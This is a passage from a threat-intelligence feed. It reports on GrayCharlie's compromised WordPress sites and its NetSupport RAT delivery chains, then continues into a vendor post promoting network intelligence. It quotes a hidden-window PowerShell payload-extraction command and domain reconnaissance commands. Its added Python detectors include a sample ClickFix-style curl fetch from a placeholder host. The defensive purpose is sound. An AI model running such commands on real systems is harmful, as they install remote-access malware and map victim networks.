            <div>2025-02-06</div>
          </div>
        </div>
        <p><em><strong>Table 4:</strong></em> <em>Additional infrastructure possibly linked to GrayCharlie (Source: Recorded Future)</em></p>
        <h5>Type 2: “Activitar”</h5>
        <p>Insikt Group identified an additional set of staging infrastructure, referred to as “Type 2.” The IP addresses in this cluster commonly host websites built from the same “Activitar” template (see <strong>Figure 3</strong>). Insikt Group assesses that this template was sourced elsewhere and is not unique to GrayCharlie.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1156a61a7697db00d450ae4f44a3a4252c377b599.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 3:</strong></em> <em>Website impersonating “Activitar” (Source: Recorded Future)</em></div>
          </div>
        </div>
        <p>A subset of domains and IP addresses associated with Type 2 is presented in <strong>Table 5</strong>. Notably, most of the IP addresses are also announced by AS202015 (HZ Hosting Ltd), and one domain in <strong>Table 5</strong>, <em>filmlerzltyazilimsx[.]shop</em>, is linked to the email address <em>oreshnik[@]mailum[.]com</em> through its WHOIS record.</p>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>ASN</strong></div>
          </div>
          <div>
            <div>filmlerzltyazilimsx[.]shop</div>
            <div>79[.]141[.]163[.]169</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>foolowme[.]com</div>
            <div>144[.]172[.]115[.]211</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>joiner[.]best</div>
            <div>79[.]141[.]162[.]135</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>lowi1[.]com</div>
            <div>185[.]33[.]86[.]11</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>morniksell[.]com</div>
            <div>172[.]86[.]90[.]84</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>persistancejs[.]store</div>
            <div>185[.]80[.]53[.]79</div>
            <div>AS59711</div>
          </div>
          <div>
            <div>pomofight[.]com</div>
            <div>45[.]61[.]134[.]76</div>
            <div>AS14956</div>
          </div>
          <div>
            <div>port4loms[.]com</div>
            <div>194[.]15[.]216[.]118</div>
            <div>AS197155</div>
          </div>
          <div>
            <div>signaturepl[.]com</div>
            <div>77[.]83[.]199[.]162</div>
            <div>AS202015</div>
          </div>
          <div>
            <div>yungask[.]com</div>
            <div>91[.]193[.]19[.]220</div>
            <div>AS202015</div>
          </div>
        </div>
        <p><em><strong>Table 5:</strong></em> <em>Domains and IP addresses linked to Type 2 staging infrastructure (Source: Recorded Future)</em></p>
        <h4>Compromised Infrastructure</h4>
        <p>GrayCharlie commonly injects malicious scripts into the Document Object Model (DOM) of compromised WordPress sites using script tags. Insikt Group has identified several recurring URL patterns tied to this activity: some URLs load externally hosted JavaScript files (such as <em>hxxps://joiner[.]best/work/original[.]js</em>), while others call a PHP file on specific endpoints <a href="https://urlscan.io/result/0199e8a3-1d07-76d2-9ccb-39ea171d3744/dom">using</a> an ID parameter (such as <em>hxxps://signaturepl[.]com/work/index[.]php?abje2LAw</em>). Notably, these URLs are updated over time by the threat actor, complicating detection and indicating the threat actor maintains ongoing access to a large pool of compromised WordPress installations. <strong>Appendix A</strong> lists a subset of WordPress websites infected by GrayCharlie.</p>
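        <p>Because the injected tags point at a third-party host and keep the <code>/work/original.js</code> and <code>/work/index.php?&lt;id&gt;</code> shapes even as the hosts and ID values rotate, a site owner or responder can sweep a saved copy of a page for them. The following is an added example written for this post, not Insikt Group's or any WordPress project's code; the sample HTML, the <code>.invalid</code> hostnames and the site-host argument are constructed.</p>

```python
"""Flag externally hosted <script> sources on a WordPress page that match the
URL shapes described above (/work/original.js and /work/index.php?<id>).

Added example for site owners and responders, not Insikt Group's tooling.
The page HTML and the .invalid hostnames are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Path shapes taken from the report's examples; the query-string ID is ignored
# because the actor rotates it.
SUSPICIOUS_PATH = re.compile(r"/work/(original\.js|index\.php)$", re.I)


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in the document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def find_suspicious_scripts(html, site_host):
    """Return (flagged, external): flagged are third-party script URLs matching
    the known path pattern; external lists all third-party script URLs so an
    analyst can review the ones the pattern does not cover."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    flagged, external = [], []
    for src in parser.srcs:
        parts = urlsplit(src)
        if not parts.netloc or parts.netloc.lower() == site_host.lower():
            continue  # relative or same-origin script: out of scope here
        external.append(src)
        if SUSPICIOUS_PATH.search(parts.path):
            flagged.append(src)
    return flagged, external


# Constructed page: two first-party scripts, one ordinary third-party script,
# and two injected tags shaped like the ones in the report.
SAMPLE_HTML = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="https://www.lawfirm.invalid/wp-content/themes/t/main.js"></script>
<script src="https://cdn.analytics.invalid/tag.js"></script>
<script type="text/javascript" src="https://staging-a.invalid/work/original.js"></script>
<script src="https://staging-b.invalid/work/index.php?abje2LAw"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    flagged, external = find_suspicious_scripts(SAMPLE_HTML, "www.lawfirm.invalid")
    print("flagged:", flagged)
    print("other external:", [s for s in external if s not in flagged])
```

        <p>The two injected tags are flagged and the analytics script is returned only in the external list for manual review. Sweep the rendered page rather than the theme files alone: the report notes the actor updates these URLs over time, so the list of external script hosts, not just the two path shapes, is the thing worth baselining per site.</p>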
        <p>Although the exact initial access vector is unknown, it is likely that the actors either purchase access, such as via malware logs containing WordPress admin credentials, or exploit vulnerable WordPress plugins. The latter <a href="https://www.wp-1click.com/blog/how-hackers-target-wordpress-sites/">remains</a> the most frequent cause of all WordPress compromises.</p>
        <h4>Suspected Compromise of “Law Firm Acceleration Company” SMB Team</h4>
        <p>While the GrayCharlie-linked compromised WordPress sites span a wide range of industry verticals, in a few rare instances, the threat actors appear to have obtained, either through their own intrusions or via a third party, a more targeted set of WordPress domains. Specifically, at least fifteen websites belonging to US law firms were observed loading the external JavaScript hosted at <em>hxxps://persistancejs[.]store/work/original[.]js</em> (see <strong>Table 6</strong>).</p>
        <p>Insikt Group assesses that GrayCharlie (or the third party GrayCharlie works with) likely compromised these websites through a supply-chain vector. One potential avenue is SMB Team, the self-described “fastest-growing law firm acceleration company,” which has supported thousands of firms across North America, according to its website, as its logo and other references appear across many of the websites listed in <strong>Table 6</strong> (see <strong>Figure 4</strong>). Notably, credentials associated with an SMB Team email address used for a WordPress hosting platform surfaced around the same time that the domain <em>persistancejs[.]store</em> first began resolving. This temporal overlap suggests that the threat actors may have gained access to SMB Team-related infrastructure through the use of legitimate, compromised credentials.</p>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>Company</strong></div>
            <div><strong>Country</strong></div>
            <div><strong>SMB Team</strong></div>
          </div>
          <div>
            <div>bianchilawgroup[.]com</div>
            <div>Bianchi Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brattonlawgroup[.]com</div>
            <div>Bratton Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>brighterdaylaw[.]com</div>
            <div>Brighter Day Law</div>
            <div>US</div>
            <div>N/A</div>
          </div>
          <div>
            <div>defensegroup[.]com</div>
            <div>The Defense Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>dwicriminallawcenter[.]com</div>
            <div>Benjamin Law Firm LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>fisherstonelaw[.]com</div>
            <div>Fisher Stone, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>jarrettfirm[.]com</div>
            <div>Jarrett &amp; Price LLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>raineyandrainey[.]com</div>
            <div>Rainey &amp; Rainey Attorneys At Law PLLC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rbbfirm[.]com</div>
            <div>Buchanan Law Group</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>rmvlawyer[.]com</div>
            <div>The Law Office of Brian Simoneau, P.C.</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]brentadams[.]com</div>
            <div>Brent Adams &amp; Associates</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]cfblaw[.]com</div>
            <div>Cohen Forman Barone, PC</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]gerlinglaw[.]com</div>
            <div>Gerling Law Injury Attorneys</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]immigration-defense[.]com</div>
            <div>Law Offices of Daniel Shanfield</div>
            <div>US</div>
            <div>Yes</div>
          </div>
          <div>
            <div>www[.]schwartzandschwartz[.]com</div>
            <div>Schwartz &amp; Schwartz Attorneys at Law, P.A.</div>
            <div>US</div>
            <div>N/A</div>
          </div>
        </div>
        <p><em><strong>Table 6:</strong></em> <em>Compromised law firm websites linked to GrayCharlie (Source: Recorded Future)</em></p>
        <div>
          <div>
            <div>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18fd20865333f5d84a84b457d80ddd430d382877b.png?width=750&amp;format=png&amp;optimize=medium" width="1588" height="830" />
              </p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ebd43f461510a56badf377e44049eaf90555a74a.png?width=750&amp;format=png&amp;optimize=medium" width="430" height="117" />
              </p>
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Website of Gerling Law Injury Attorneys (top) and SMBTeam logo (bottom) (Source:</em> <em><a href="https://urlscan.io/result/019b035c-aed8-73a6-8f38-60388c596fb6">URLScan</a>)</em></div>
          </div>
        </div>
        <p>Notably, while an SMB Team compromise is possible, Insikt Group also assesses that the actors may have exploited a specific version of WordPress or its plugins used by SMB Team, which could explain the simultaneous compromise of all affected websites.</p>
        <p>In some instances, the same WordPress site is compromised by multiple threat actors simultaneously. For example, <em>bianchilawgroup[.]com</em> has also been compromised by TAG-124 (also known as LandUpdate808 or Kongtuke) since at least December 2025, which <a href="https://urlscan.io/result/019b027f-5214-74ff-b1e3-efec9160620d/dom">used</a> the domain <em>vimsltd[.]com</em>.</p>
        <h4>Higher-Tier Analysis</h4>
        <p>GrayCharlie administers its staging infrastructure primarily over SSH, though other ports are used intermittently. The group manages its NetSupport RAT C2 servers over TCP port 443. Overall, Insikt Group assesses that GrayCharlie relies extensively on proxy services to administer its infrastructure. Additionally, based on presumed browsing activity from higher-tier servers, at least some individuals linked to GrayCharlie are assessed to be Russian-speaking.</p>
        <h3>Attack-Chain Analysis</h3>
        <p>GrayCharlie has been observed using two different attack chains to deliver NetSupport RAT. The first chain uses compromised websites to distribute a fake browser update that triggers the retrieval and installation of a script-based payload; the second chain uses compromised WordPress sites and a ClickFix-style lure that copies a command to fetch and install the RAT. Both culminate in NetSupport execution from <code>%AppData%</code>, Registry Run key persistence, and C2 connectivity; the technical details are expanded below.</p>
        <h4>Attack Chain 1: Fake Browser Update Leading to NetSupport RAT</h4>
        <p>According to public reporting, when GrayCharlie first <a href="https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates">became</a> active in mid-2023, it <a href="https://www.threatdown.com/blog/smartapesg-06-11-2024/">relied</a> on fake browser updates to deliver the NetSupport RAT. Although the group later shifted to the ClickFix technique, Insikt Group <a href="https://infosec.exchange/@monitorsg/115363334718836118">observed</a> a return to fake browser updates as early as October 12, 2025. <strong>Figure 5</strong> provides an overview of Attack Chain 1.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ca8e19bb49da0d1924539da6e91ae9ddaf6d3227.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="475" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 5:</strong></em> <em>Attack Chain 1 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Website compromise and lure delivery</strong>. Threat actors modify legitimate sites to load malicious scripts that render a browser-specific “update” prompt. Selecting the prompt initiates download of a ZIP “update” package containing a primary JavaScript file alongside decoy <code>.dat</code> files.</li>
          <li><strong>User-executed JavaScript loader</strong>. The victim manually runs the <code>.js</code> script. The script mimics a benign browser component to reduce suspicion while silently initiating the next stage of the attack.</li>
          <li><strong>PowerShell staging via WScript</strong>. The JavaScript launches <code>wscript.exe</code>, which spawns <code>powershell.exe</code>. PowerShell reaches out to a remote host to fetch an obfuscated JavaScript containing encoded tasking.</li>
          <li><strong>Secondary payload retrieval</strong>. PowerShell decodes instructions and downloads the actual payload ZIP archive. This archive contains a complete NetSupport RAT client set, including <code>client32.exe</code> and required DLLs.</li>
          <li><strong>File deployment and execution</strong>. The archive is extracted under the user profile (for example, <code>%AppData%\Roaming\...</code>). <code>client32.exe</code> is started in the background to minimize visible indicators to the user.</li>
          <li><strong>Persistence establishment</strong>. A Windows Run registry key is created to automatically launch <code>client32.exe</code> at logon, ensuring the NetSupport RAT remains active after reboots without requiring further user interaction.</li>
          <li><strong>C2 readiness</strong>. With the NetSupport RAT client running on the infected host, the endpoint is prepared to establish command-and-control connectivity with the attacker's infrastructure.</li>
        </ol>
        <h4>Attack Chain 2: WordPress Redirects and ClickFix Leading to NetSupport RAT</h4>
        <p>As early as April 2025, GrayCharlie <a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">began</a> using ClickFix as a secondary attack chain, consistent with industry reporting that many threat actors have adopted ClickFix techniques due to their effectiveness. <strong>Figure 6</strong> provides an overview of Attack Chain 2.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1ae1c0d8952cb5c0f7b8157e5acfe6511630de60c.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="618" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>Attack Chain 2 (Source: Recorded Future)</em></div>
          </div>
        </div>
        <ol>
          <li><strong>Initial delivery and redirection.</strong> Phishing emails, malicious PDFs, or links on gaming sites direct users to compromised WordPress pages that embed attacker JavaScript.</li>
          <li><strong>Background script and profiling.</strong> A background script loads when the site is visited, injects an iframe, and profiles the environment (such as the operating system and browser) to deliver the next stage.</li>
          <li><strong>ClickFix fake CAPTCHA.</strong> The page presents a fake CAPTCHA that quietly copies a malicious command to the user’s clipboard and instructs them to paste it into the Windows Run dialog (Win+R), turning social engineering into user-assisted execution (see <strong>Figure 7</strong>).</li>
        </ol>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f878a544b5193108d0dd7bc5d1359a3487d5a705.png?width=750&amp;format=png&amp;optimize=medium" width="509" height="392" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 7:</strong></em> <em>Fake Captcha (Source:</em> <em><a href="https://www.elastic.co/security-labs/a-wretch-client">Elastic</a>)</em></div>
          </div>
        </div>
        <ol start="4">
          <li><strong>Command-driven staging.</strong> The pasted command retrieves a batch file that downloads a ZIP containing NetSupport RAT and uses PowerShell to extract it into <code>%AppData%\Roaming\</code> (see <strong>Figure 8</strong>).</li>
        </ol>
        <div>
          <div>
            <div><code>powershell -Win^dow Style Hidden -Command "Add-Type -AssemblyName 'System. IO.Compression FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('!CF0JOAXML!','!WFHEYHKMZ!')"</code></div>
          </div>
        </div>
        <p><em><strong>Figure 8:</strong></em> <em>PowerShell command (Source:</em> <em><a href="https://www.cybereason.com/blog/net-support-rat-wordpress-clickfix">Cybereason</a>)</em></p>
        <ol start="5">
          <li><strong>NetSupport RAT launch and persistence.</strong> The batch file starts <code>client32.exe</code> and sets a Run registry key to automatically relaunch the NetSupport RAT client at startup, establishing persistence on the endpoint.</li>
          <li><strong>Remote access and follow-on actions.</strong> Once connected to C2, operators can interact with the system, perform reconnaissance (for example, domain group membership queries), transfer files, execute additional commands, and potentially move laterally using access acquired from the host.</li>
        </ol>
        <h3>Observed Operator Activity</h3>
        <p>In October 2025, Insikt Group detonated a NetSupport RAT sample (SHA256: 31804c48f9294c9fa7c165c89e487bfbebeda6daf3244ad30b93122bf933c79c) with the C2 server <em>5[.]181[.]156[.]234[:]443</em> linked to GrayCharlie within a controlled environment. Approximately three hours later, on the same day, the threat actor connected using NetSupport RAT, compressed and moved two files, and then executed group and account reconnaissance commands. The same actor returned three days later and repeated the previously observed reconnaissance commands (see <strong>Figure 9</strong>).</p>
        <div>
          <div>
            <div>
              <pre><code>net group /domain "Domain COmputers"
C:\Windows\system32\net1 group /domain "Domain COmputers"
</code></pre>
            </div>
          </div>
        </div>
        <p><em><strong>Figure 9:</strong></em> <em>Reconnaissance commands (Source: Recorded Future)</em></p>
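        <p>Detection logic for the two attack chains above and the Figure 9 reconnaissance, added here as an example and not part of Recorded Future's report or its Appendix D Sigma rules. It runs over constructed Sysmon-style process and registry events; every path, SID, URL and the two-stage correlation threshold in it are assumptions for illustration.</p>

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class Event:
    """One endpoint telemetry record. Field names are Sysmon-like, but every
    record in this file is constructed for the example, not real telemetry."""
    kind: str                  # "process" (process creation) or "registry" (value set)
    image: str = ""            # executing image (process events)
    parent_image: str = ""     # parent image (process events)
    command_line: str = ""     # full command line (process events)
    target_object: str = ""    # registry path (registry events)
    details: str = ""          # registry value data (registry events)


RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
APPDATA_RE = re.compile(r"\\AppData\\Roaming\\", re.I)
RUN_DIALOG_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "curl.exe"}


def squash(cmd: str) -> str:
    """Drop cmd.exe caret escapes (the '-Win^dow Style' trick in Figure 8) and all
    whitespace, then lower-case, so spacing games do not defeat substring matches."""
    return re.sub(r"\s+", "", cmd.replace("^", "")).lower()


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: Event) -> list[str]:
    """Return the name of every chain stage this single event matches."""
    hits: list[str] = []
    if ev.kind == "registry":
        # Persistence in both chains: a Run value pointing at client32.exe
        if RUN_KEY_RE.search(ev.target_object) and "client32.exe" in ev.details.lower():
            hits.append("run_key_client32")
        return hits
    img, parent = basename(ev.image), basename(ev.parent_image)
    cmd = squash(ev.command_line)
    # Chain 1, step 2: the user double-clicks the .js "update" from the ZIP
    if img == "wscript.exe" and parent == "explorer.exe" and re.search(r'\.js"?$', cmd):
        hits.append("user_launched_js")
    # Chain 1, step 3: wscript.exe spawning powershell.exe
    if img == "powershell.exe" and parent == "wscript.exe":
        hits.append("wscript_spawns_powershell")
    # Chain 2, step 3: a Win+R paste runs under explorer.exe and fetches from a URL
    if parent == "explorer.exe" and img in RUN_DIALOG_CHILDREN and "http" in cmd:
        hits.append("run_dialog_download")
    # Figure 8: hidden-window PowerShell unpacking the RAT ZIP with ExtractToDirectory
    if img == "powershell.exe" and "extracttodirectory" in cmd and (
            "windowstylehidden" in cmd or "-whidden" in cmd):
        hits.append("hidden_ps_zip_extract")
    # Step 5: the NetSupport client started from under the user profile
    if img == "client32.exe" and APPDATA_RE.search(ev.image):
        hits.append("client32_from_appdata")
    # Figure 9: domain group reconnaissance through net.exe / net1.exe
    if img in {"net.exe", "net1.exe"} and "group/domain" in cmd:
        hits.append("domain_group_recon")
    return hits


def analyze_host(events: list[Event]) -> dict:
    """Correlate hits across one host. Two or more distinct stages is treated as a
    probable NetSupport RAT chain; that threshold is an assumption of this example."""
    seen: list[str] = []
    for ev in events:
        for hit in check_event(ev):
            if hit not in seen:
                seen.append(hit)
    return {"hits": seen, "probable_chain": len(seen) >= 2}


# Constructed Chain 1 telemetry for one host (user name, paths and SID are made up).
SAMPLE_CHAIN1_EVENTS = [
    Event("process", image=r"C:\Windows\System32\wscript.exe", parent_image=r"C:\Windows\explorer.exe",
          command_line=r'"C:\Windows\System32\wscript.exe" "C:\Users\jdoe\Downloads\Update\Update.js"'),
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\System32\wscript.exe",
          command_line=r'''powershell -Win^dowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\jdoe\AppData\Local\Temp\u.zip','C:\Users\jdoe\AppData\Roaming\Client')"'''),
    Event("process", image=r"C:\Users\jdoe\AppData\Roaming\Client\client32.exe",
          parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r'"C:\Users\jdoe\AppData\Roaming\Client\client32.exe"'),
    Event("registry", target_object=r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Client",
          details=r"C:\Users\jdoe\AppData\Roaming\Client\client32.exe"),
    Event("process", image=r"C:\Windows\System32\net1.exe", parent_image=r"C:\Windows\System32\net.exe",
          command_line=r'C:\Windows\system32\net1 group /domain "Domain COmputers"'),
]
# Constructed Chain 2 step 3: a command pasted into Win+R fetching a batch file (placeholder URL).
CLICKFIX_EVENT = Event("process", image=r"C:\Windows\System32\cmd.exe", parent_image=r"C:\Windows\explorer.exe",
                       command_line=r"cmd /c curl http://placeholder.invalid/update.bat -o %TEMP%\u.bat")
# Constructed benign activity that shares single features (PowerShell under explorer, a Run value).
BENIGN_EVENTS = [
    Event("process", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=r'powershell -NoProfile -Command "Get-ChildItem C:\Users\jdoe\Documents"'),
    Event("registry", target_object=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
          details=r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]

if __name__ == "__main__":
    print("chain1:", analyze_host(SAMPLE_CHAIN1_EVENTS))
    print("clickfix:", check_event(CLICKFIX_EVENT))
    print("benign:", analyze_host(BENIGN_EVENTS))
```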
        <p>When both files were compressed into a single ZIP archive and the executable was detonated, the process sideloaded a DLL identified as Sectop RAT (SHA256: 59e7e7698d77531bfbfea4739d29c14e188b5d3109f63881b9bcc87c72e9de78) with the C2 server <em>85[.]158[.]110[.]179[:]15847</em>. The executable (SHA256: 5f1bd92ad6edea67762c7101cb810dc28fd861f7b8c62e6459226b7ea54e1428) was identified as “Merge XML Files”, version 1.2.0.0, developed by Vovsoft, and was signed with a digital certificate that expired on October 31, 2025.</p>
        <h2>Mitigations</h2>
        <ul>
          <li>Leverage the IoCs in <strong>Appendix A</strong> and <strong>Appendix B</strong> to investigate potential past or ongoing infections, both successful and attempted; Recorded Future customers can use the Recorded Future Intelligence Operations Platform to monitor for future IoCs associated with GrayCharlie.</li>
          <li>Monitor for validated infrastructure associated with the malware families discussed in this report, including NetSupport RAT and Stealc, as well as numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.</li>
          <li>Leverage the Sigma, YARA, and Snort rules provided in <strong>Appendices D</strong>, <strong>E</strong>, and <strong>F</strong> in your security information and event management (SIEM) or endpoint detection and response (EDR) tools to detect the presence or execution of NetSupport RAT. Customers can use additional detection rules available in the Recorded Future Intelligence Operations Platform.</li>
          <li>Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure.</li>
          <li>Use the Recorded Future Intelligence Operations Platform to monitor GrayCharlie, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.</li>
          <li>Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to your company. For example, if you want to stay informed about activities related to GrayCharlie, you can receive regular AI-generated updates on this threat actor.</li>
        </ul>
        <h2>Outlook</h2>
        <p>GrayCharlie has been operating for more than two years, and despite shifts in its tactics, such as alternating between fake updates and ClickFix techniques or transitioning from SmartApe to other hosting providers like MivoCloud, the group’s core behaviors have remained consistent. Given its sustained activity, GrayCharlie is highly likely to remain active and continue targeting organizations worldwide, with a current emphasis on US entities, as indicated by Recorded Future Network Intelligence.</p>
        <p>Insikt Group will continue to closely monitor GrayCharlie to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: Indicators of Compromise</h2>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_187b8e348054a7063fd37aec148dfc3337efc5d14.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Network Intelligence: Your Questions, Global Answers]]></title>
            <link>https://www.recordedfuture.com/ko/blog/network-intelligence-questions-answered</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/network-intelligence-questions-answered</guid>
            <pubDate>Mon, 16 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how network intelligence gives security teams control over threat investigation with global visibility—no more drowning in generic, passive threat feeds.]]></description>
            <content:encoded><![CDATA[
        <h2>The Problem with Pre-Packaged Intelligence</h2>
        <p>Security teams are drowning in threat intelligence feeds. Hundreds of vendors promise comprehensive coverage, real-time alerts, and actionable insights. Yet sophisticated adversaries continue to operate undetected, incidents take weeks to scope, and attribution remains elusive.</p>
        <p>The fundamental issue isn't quality but control. Traditional network visibility solutions force passive consumption: their alerts, their priorities, their timeline. This one-size-fits-all approach assumes threats targeting financial services match those facing critical infrastructure, or that yesterday's patterns predict tomorrow's campaigns.</p>
        <p>Network intelligence flips this model. With global visibility spanning billions of connections across 150+ sensors in 35+ countries, you can investigate what matters to your organization using your own selectors, questions, and mission requirements.</p>
        <h2>What Network Intelligence Actually Means</h2>
        <p>Effective network intelligence requires global visibility at scale: distributed sensors across dozens of countries processing billions of packets daily, generating tens of millions of network flow records. But collection methodology matters equally. Metadata-only approaches capture source and destination IPs, ports, protocols, flow counts, and timestamps without payloads or deep packet inspection. This enables operation at internet scale while better maintaining ethical boundaries and data minimization standards.</p>
        <p>At Recorded Future, our network intelligence capabilities provide access to these global network traffic observations for specific IP addresses of interest. Our Insikt Group uses this same infrastructure to research 500+ malware families and threat actors. Government CERTs use these capabilities to analyze adversary infrastructure at national scale.</p>
        <h2>What This Means in Practice</h2>
        <p>Consider what changes when your security operations can query global network intelligence.</p>
        <p><strong>Faster SOC Triage</strong></p>
        <p>Your team flags a suspicious IP at 2 AM. Instead of guessing whether it's noise or the start of something worse, query the network intelligence platform. See its global communication patterns instantly. Understand whether you're looking at commodity scanning or infrastructure that's been quietly staging against targets for weeks. Internet scanner detection capabilities automatically classify the behavior and reveal specific ports targeted, web requests made, and geographic distribution. Triage in minutes, not hours.</p>
        <p><strong>Targeted or Opportunistic? Now You'll Know</strong></p>
        <p>When threats hit your industry, the first question is always: are we specifically in the crosshairs, or is this spray-and-pray? Network intelligence lets you track adversary infrastructure across your sector before it reaches your perimeter. See the pattern. Understand the targeting. Brief leadership with confidence because you're no longer guessing. You're showing them the actual traffic patterns that prove whether your organization is in the crosshairs or caught in the spray.</p>
        <p><strong>Fraud Infrastructure Exposed</strong></p>
        <p>Fraud campaigns depend on infrastructure that moves fast but leaves traces. Your selectors, run against global network intelligence, can reveal the networks behind credential stuffing, account takeover, and payment fraud before the campaign fully scales.</p>
        <p><strong>Attribution That Actually Holds Up</strong></p>
        <p>Mapping adversary infrastructure is hard. Connecting it to broader campaigns and ultimate operators is harder. Network intelligence gives you the longitudinal visibility to trace how infrastructure evolves, clusters, and connects. Administrative traffic analysis reveals patterns operators use to manage C2 infrastructure. When you identify admin flows from a common source connecting to multiple C2 servers, you're mapping the operator's pattern based on observed behavior across hundreds of global vantage points. You're turning indicators into intelligence.</p>
        <h2>Integration Into Security Workflows</h2>
        <p>Network intelligence integrates directly into existing security workflows through API access to SIEMs, SOAR platforms, and custom analysis tools. When your SIEM flags suspicious traffic, automated queries reveal global context: Is this IP conducting C2 communications? Scanning your sector specifically? Connected to infrastructure from last month's campaign? Curated threat lists reduce noise from legitimate security research while enabling early blocking of targeted reconnaissance, turning your existing tools into instruments for active investigation rather than passive alerting.</p>
        <h2>When Expertise Becomes Essential</h2>
        <p>For organizations facing persistent, sophisticated adversaries, network intelligence capabilities alone aren't sufficient. The difference between having access to global network visibility and operationalizing it effectively comes down to tradecraft.</p>
        <p>Recorded Future's Global Network Intelligence Advisory program addresses this by pairing technical capabilities with forward-deployed analysts and embedded engineers who work directly inside your SOC or intelligence fusion center. This becomes especially critical when nation-states are mapping your critical infrastructure, when advanced persistent threats are staging for long-term access, or when attribution could influence strategic decision-making. You need the ability to investigate specific questions with global visibility and the expertise to interpret what you find.</p>
        <h2>The Compliance Framework That Enables Trust</h2>
        <p>Network intelligence operates under strict ethical and legal guidelines. All use is subject to our Acceptable Use Policy, and surveillance, profiling of individuals, and political targeting are prohibited. Access is invitation-only, requiring vetting and agreement to specific terms of use.</p>
        <p>These aren't just policies; they are foundational to how this capability operates. The metadata-only collection model, the data minimization approach, and the geographic distribution that prevents any single point of visibility into user communications are design choices. These constraints aren't obstacles to effectiveness but enablers of trust. They allow powerful intelligence capabilities to exist while promoting appropriate boundaries.</p>
        <h2>Moving Forward</h2>
